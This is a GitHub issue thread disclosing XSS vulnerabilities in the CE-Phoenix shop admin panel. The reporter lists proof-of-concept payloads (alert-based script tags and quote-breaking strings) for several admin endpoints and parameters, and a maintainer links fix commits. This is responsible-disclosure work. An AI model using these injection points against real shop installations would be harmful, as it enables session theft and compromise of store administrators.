Skip to content
This repository has been archived by the owner on Jun 7, 2024. It is now read-only.

XSS vulnerabilities in the admin panel #1039

Closed
ovanr opened this issue Jan 27, 2021 · 2 comments
Closed

XSS vulnerabilities in the admin panel #1039

ovanr opened this issue Jan 27, 2021 · 2 comments
Assignees
@ecartz
Labels
In Progress

Comments

@ovanr
Copy link

ovanr commented Jan 27, 2021
edited
Loading

Issue description

An RXSS vulnerability was identified in the admin panel due to insufficient sanitization of the GET parameter 'module'.
As a result Javascript code can get executed using an exploit link.

Steps to reproduce the issue

  1. Login in the admin panel to retrieve the session cookies
  2. Send the link: http://{HOSTNAME}/admin/action_recorder.php?module=';alert(0xdeadbeef);'&aID
  3. Click on a row in the HTML table, and the alert is shown

Additional details / screenshot

  • The XSS payload leaves the URL link

  • Proof
ecartz added a commit that referenced this issue Jan 27, 2021
@ecartz
Only allow modules that are available
d0c8a1a 
This removes the module GET parameter if it doesn't match any of
the installed modules.

#1039
@ovanr
Copy link
Author

ovanr commented Jan 27, 2021

This commit still allows other parameters to enter in the URL without being sanitized.
For instance this URL still triggers the bug:
http://{HOSTNAME}/admin/action_recorder.php?module=ar_admin_login&aID&myxss=';alert(0xdeadbeef);'

In Line 157 of admin/action_recorder.php:

  • tep_get_all_get_params outputs all GET parameters without any sanitization
  • tep_href_link only encodes the double quote character

@ovanr ovanr mentioned this issue Jan 27, 2021
Closed
@ecartz ecartz self-assigned this Jan 31, 2021
@ovanr
Copy link
Author

ovanr commented Feb 6, 2021
edited
Loading

Multiple more XSS bugs were found in the admin panel.

  • the $_POST['option_name[1]'] parameter in:
      URL

      /admin/products_attributes.php

      GET parameters
      
      action: add_product_options
      option_page: 1
      value_page: 1
      attribute_page: 1
      
      POST parameters
      
      products_options_id: 2
      option_name[1]: <script>alert(1);</script>
      sort_order[1]: 32
  • the POST fields in (payload can also be triggered in the user store):
      URL

      /admin/categories.php

      GET parameters
      
      action: insert_category
      cPath: ''

      POST parameters
      
      categories_name[1]: <script>alert(1);</script>
      categories_seo_title[1]: <script>alert(2);</script> 
      categories_description[1]: <script>alert(3);</script>
      categories_seo_description[1]: <script>alert(4);</script>
      categories_image: any
      sort_order: 1
  • the $_POST['value_name[1]'] parameter in:
      URL

      /admin/products_attributes.php
      
      GET parameters

      action: add_product_option_values
      option_page: 1
      value_page: 1
      attribute_page: 1

      POST parameters
     
      option_id: 1
      value_id: 3
      value_name[1]: <script>alert(1)</script>
      sort_order[1]: 2
  • the $_POST['products_description[1]'] and $_POST['products_name[1]'] parameters in:
      URL

      /admin/categories.php

      GET parameters
      
      cPath: ''
      action: insert_product	

      POST parameters
      
      products_status: 1
      products_quantity: 323 
      products_date_available: ''
      manufacturers_id: ''
      products_model: Any
      products_tax_class_id: 0
      products_price: 3232
      products_price_gross: 3232
      products_weight: 3232
      products_gtin: ''
      products_name[1]: <script>alert(1);</script>
      products_description[1]: <script>alert(2);</script>
      products_url: ''
      products_seo_title[1]: ''
      products_seo_description[1]: ''
      products_seo_keywords[1]: ''
      products_image: Any
      products_date_added: 2021-02-06 16:44:43

Note: Other post parameters may also be vulnerable

  • the $_GET['zID'] parameter in:
      URL

      /admin/geo_zones.php 
      
      GET parameters
       
      zID: '-alert(1)-'
      action: list
  • the $_POST['title'] parameter in:
      URL
     
      admin/currencies.php
      
      POST parameters
      
      cs: GBP
      title: <a onclick=alert()>clickme # 19 chars limit
      code: GBP
      symbol_left: £
      symbol_right:
      decimal_point: .
      thousands_point: ,
      decimal_places: 2
      value: 1
  • the $_GET['zpage'] parameter in:
      URL
       
      /admin/geo_zones.php
      
      GET parameters
      
      zpage: '-alert(1)-'
      action: list

Note: there is a CVE record for this bug CVE

  • the $_GET['spage'] parameter in:
      URL     
      
      /admin/geo_zones.php
      
      GET parameters
      
      spage: '-alert(1)-'
      action: list

Note: there is a CVE record for this bug CVE

  • the $_POST['title'] and $_POST['content'] parameter in:
      URL
     
      /admin/newsletters.php
      
      POST parameters
      
      module: newsletter
      title: <script>alert(1);</script>
      content: <script>alert(2);</script>

@ovanr ovanr changed the title RXSS vulnerability in action_recorder.php XSS vulnerabilities in the admin panel Feb 6, 2021
ecartz added a commit to CE-PhoenixCart/PhoenixCart that referenced this issue Jun 9, 2021
@ecartz
Modernize action_recorder page
fbfa4e5 
As a side effect, this should resolve the original report at
gburton/CE-Phoenix#1039

Obviously it won't resolve the other pages, which would be separate.
@ecartz ecartz closed this as completed Sep 10, 2021
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees

@ecartz ecartz

Labels
In Progress
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@gburton @ecartz @ovanr